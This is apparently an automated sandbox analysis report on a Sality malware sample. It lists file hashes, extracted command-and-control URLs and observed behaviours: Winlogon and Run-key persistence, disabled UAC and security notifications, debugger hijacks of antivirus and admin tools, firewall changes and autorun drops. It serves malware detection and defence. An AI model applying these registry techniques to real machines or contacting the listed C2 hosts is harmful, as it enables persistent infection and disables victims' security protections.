Analysis
-
max time kernel
16s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
21/09/2024, 19:37
Behavioral task
behavioral1
Sample
f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe
Resource
win7-20240704-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe
Resource
win10v2004-20240802-en
windows10-2004-x64
36 signatures
150 seconds
General
-
Target
f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe
-
Size
368KB
-
MD5
f04861809694b1c8661a3adbfd11045d
-
SHA1
01dc81993524aded936f960a7ea60f152abd80c5
-
SHA256
da56ff6445214f6a37147898a55b6b3b2d4a83fa515ff213d45d550124f11c5e
-
SHA512
f5e6ae66743f6dd95afaf560cb7ed8a5896733ac37379cf59d9f5c118b0df8852cb9569735c209e65ff294769697a786542d8238bcf6ef3d42713ede8538d079
-
SSDEEP
6144:OYDhB6ActM8FbPt6a15RGkPNJAcb+k2WzoPiML3AYRYAe5mYkl5nm65jDDdgkeKH:p9BvctM85t35JPNJj2WzoRLQYRYzmYO9
Malware Config
Extracted
Family
sality
C2
http://89.119.67.154/testo5/
http://kukutrustnet777.info/home.gif
http://kukutrustnet888.info/home.gif
http://kukutrustnet987.info/home.gif
Signatures
-
Modifies WinLogon for persistence 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe C:\\Windows\\SysWOW64\\fdisk.com" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\SysWOW64\\userinit.exe,C:\\Windows\\SysWOW64\\fdisk.com" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\SysWOW64\\userinit.exe,C:\\Windows\\SysWOW64\\fdisk.com" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe C:\\Windows\\SysWOW64\\fdisk.com" svchost.com -
Modifies visibility of file extensions in Explorer 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "2" svchost.com Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "2" svchost.com -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" svchost.com Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" svchost.com -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cftmon.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" cftmon.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Disables RegEdit via registry modification 5 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools = "1" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools = "1" svchost.com Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools = "1" cftmon.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools = "1" svchost.com Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools = "1" cftmon.exe -
Disables Task Manager via registry modification
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 48 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGNT.EXE svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VPTRAY.EXE svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashdisp.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGNT.EXE svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsgui.exe svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsgui.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashdisp.exe svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VPTRAY.EXE\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\USBGUARD.EXE svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsgui.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashdisp.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctstray.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGNT.EXE\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VPTRAY.EXE svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VPTRAY.EXE\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctstray.exe svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctstray.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctstray.exe svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashdisp.exe svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\USBGUARD.EXE svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGNT.EXE\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\USBGUARD.EXE\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\USBGUARD.EXE\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsgui.exe svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe\debugger = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com Kll_dis" svchost.com -
Modifies Windows Firewall 2 TTPs 3 IoCs
pid Process 4452 netsh.exe 1160 netsh.exe 1508 netsh.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation svchost.com Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation cftmon.exe -
Deletes itself 1 IoCs
pid Process 3448 cftmon.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sndvol32.exe svchost.com File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sndvol32.exe svchost.com -
Executes dropped EXE 4 IoCs
pid Process 2840 svchost.com 4092 cftmon.exe 4332 svchost.com 3448 cftmon.exe -
resource yara_rule behavioral2/memory/3164-0-0x0000000000400000-0x00000000004C8000-memory.dmp upx behavioral2/memory/3164-1-0x0000000003680000-0x00000000046B3000-memory.dmp upx behavioral2/memory/3164-4-0x0000000003680000-0x00000000046B3000-memory.dmp upx behavioral2/memory/3164-6-0x0000000003680000-0x00000000046B3000-memory.dmp upx behavioral2/memory/3164-24-0x0000000003680000-0x00000000046B3000-memory.dmp upx behavioral2/memory/2840-41-0x0000000000400000-0x00000000004C8000-memory.dmp upx behavioral2/files/0x00080000000233cc-29.dat upx behavioral2/memory/3164-42-0x0000000000400000-0x00000000004C8000-memory.dmp upx behavioral2/memory/3164-28-0x0000000003680000-0x00000000046B3000-memory.dmp upx behavioral2/memory/4092-80-0x0000000003270000-0x00000000042A3000-memory.dmp upx behavioral2/memory/4092-87-0x0000000003270000-0x00000000042A3000-memory.dmp upx behavioral2/memory/4092-84-0x0000000003270000-0x00000000042A3000-memory.dmp upx behavioral2/memory/4092-71-0x0000000000400000-0x00000000004C8000-memory.dmp upx behavioral2/memory/3448-124-0x0000000000400000-0x00000000004C8000-memory.dmp upx behavioral2/memory/3448-125-0x00000000033B0000-0x00000000043E3000-memory.dmp upx behavioral2/memory/4092-122-0x0000000000400000-0x00000000004C8000-memory.dmp upx behavioral2/memory/4092-119-0x0000000003270000-0x00000000042A3000-memory.dmp upx behavioral2/memory/2840-154-0x0000000000400000-0x00000000004C8000-memory.dmp upx behavioral2/memory/4332-159-0x0000000000400000-0x00000000004C8000-memory.dmp upx behavioral2/memory/3448-165-0x0000000000400000-0x00000000004C8000-memory.dmp upx behavioral2/memory/4332-230-0x0000000000400000-0x00000000004C8000-memory.dmp upx behavioral2/memory/3448-236-0x0000000000400000-0x00000000004C8000-memory.dmp upx behavioral2/memory/3232-238-0x0000000000400000-0x00000000004C8000-memory.dmp upx behavioral2/memory/3232-241-0x0000000000400000-0x00000000004C8000-memory.dmp upx behavioral2/memory/4728-244-0x0000000000400000-0x00000000004C8000-memory.dmp upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" cftmon.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" cftmon.exe -
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\HotKey = "C:\\Users\\Admin\\Templates\\cache\\SFCsrvc.pif" svchost.com Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HotKey = "C:\\Users\\Admin\\Templates\\cache\\SFCsrvc.pif" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\User Agent = "C:\\Windows\\SysWOW64\\fdisk.com" svchost.com Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\User Agent = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\HotKey = "C:\\Users\\Admin\\Templates\\cache\\SFCsrvc.pif" svchost.com Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HotKey = "C:\\Users\\Admin\\Templates\\cache\\SFCsrvc.pif" svchost.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\User Agent = "C:\\Windows\\SysWOW64\\fdisk.com" svchost.com Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\User Agent = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.com" svchost.com -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cftmon.exe -
Drops desktop.ini file(s) 5 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\{5F229C11-5039-40E4-8537-6950BB1C9ECC}\desktop.ini f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe File opened for modification C:\Users\Admin\Templates\cache\$RECYCLE.BIN\{5F229C11-5039-40E4-8537-6950BB1C9ECC}\desktop.ini svchost.com File opened for modification C:\Users\Admin\Templates\cache\desktop.ini svchost.com File opened for modification \??\c:\$RECYCLE.BIN\{5F229C11-5039-40E4-8537-6950BB1C9ECC}\desktop.ini svchost.com File opened for modification \??\f:\$RECYCLE.BIN\{5F229C11-5039-40E4-8537-6950BB1C9ECC}\desktop.ini svchost.com -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: svchost.com File opened (read-only) \??\q: svchost.com File opened (read-only) \??\r: svchost.com File opened (read-only) \??\u: svchost.com File opened (read-only) \??\u: svchost.com File opened (read-only) \??\w: svchost.com File opened (read-only) \??\z: svchost.com File opened (read-only) \??\y: svchost.com File opened (read-only) \??\h: svchost.com File opened (read-only) \??\y: svchost.com File opened (read-only) \??\m: svchost.com File opened (read-only) \??\v: svchost.com File opened (read-only) \??\o: svchost.com File opened (read-only) \??\v: svchost.com File opened (read-only) \??\b: svchost.com File opened (read-only) \??\r: svchost.com File opened (read-only) \??\s: svchost.com File opened (read-only) \??\j: svchost.com File opened (read-only) \??\k: svchost.com File opened (read-only) \??\x: svchost.com File opened (read-only) \??\l: svchost.com File opened (read-only) \??\n: svchost.com File opened (read-only) \??\e: svchost.com File opened (read-only) \??\i: svchost.com File opened (read-only) \??\l: svchost.com File opened (read-only) \??\b: svchost.com File opened (read-only) \??\m: svchost.com File opened (read-only) \??\q: svchost.com File opened (read-only) \??\a: svchost.com File opened (read-only) \??\x: svchost.com File opened (read-only) \??\h: svchost.com File opened (read-only) \??\p: svchost.com File opened (read-only) \??\t: svchost.com File opened (read-only) \??\w: svchost.com File opened (read-only) \??\g: svchost.com File opened (read-only) \??\o: svchost.com File opened (read-only) \??\t: svchost.com File opened (read-only) \??\z: svchost.com File opened (read-only) \??\p: svchost.com File opened (read-only) \??\g: svchost.com File opened (read-only) \??\i: svchost.com File opened (read-only) \??\j: svchost.com File opened (read-only) \??\s: svchost.com File opened (read-only) \??\a: svchost.com File opened (read-only) \??\k: svchost.com File opened (read-only) \??\n: svchost.com -
AutoIT Executable 9 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/memory/3164-42-0x0000000000400000-0x00000000004C8000-memory.dmp autoit_exe behavioral2/memory/4092-122-0x0000000000400000-0x00000000004C8000-memory.dmp autoit_exe behavioral2/memory/2840-154-0x0000000000400000-0x00000000004C8000-memory.dmp autoit_exe behavioral2/memory/4332-159-0x0000000000400000-0x00000000004C8000-memory.dmp autoit_exe behavioral2/memory/3448-165-0x0000000000400000-0x00000000004C8000-memory.dmp autoit_exe behavioral2/memory/4332-230-0x0000000000400000-0x00000000004C8000-memory.dmp autoit_exe behavioral2/memory/3448-236-0x0000000000400000-0x00000000004C8000-memory.dmp autoit_exe behavioral2/memory/3232-241-0x0000000000400000-0x00000000004C8000-memory.dmp autoit_exe behavioral2/memory/4728-244-0x0000000000400000-0x00000000004C8000-memory.dmp autoit_exe -
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification \??\c:\autorun.inf svchost.com File opened for modification C:\\autorun.inf svchost.com File opened for modification \??\f:\autorun.inf svchost.com File opened for modification F:\\autorun.inf svchost.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\fdisk.com svchost.com File opened for modification C:\Windows\SysWOW64\fdisk.com svchost.com -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Common Files\System\cftmon.exe svchost.com File opened for modification C:\PROGRAM FILES\7-ZIP\7z.exe cftmon.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SYSTEM.INI f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe File created C:\Windows\Help\cliconf.chm svchost.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
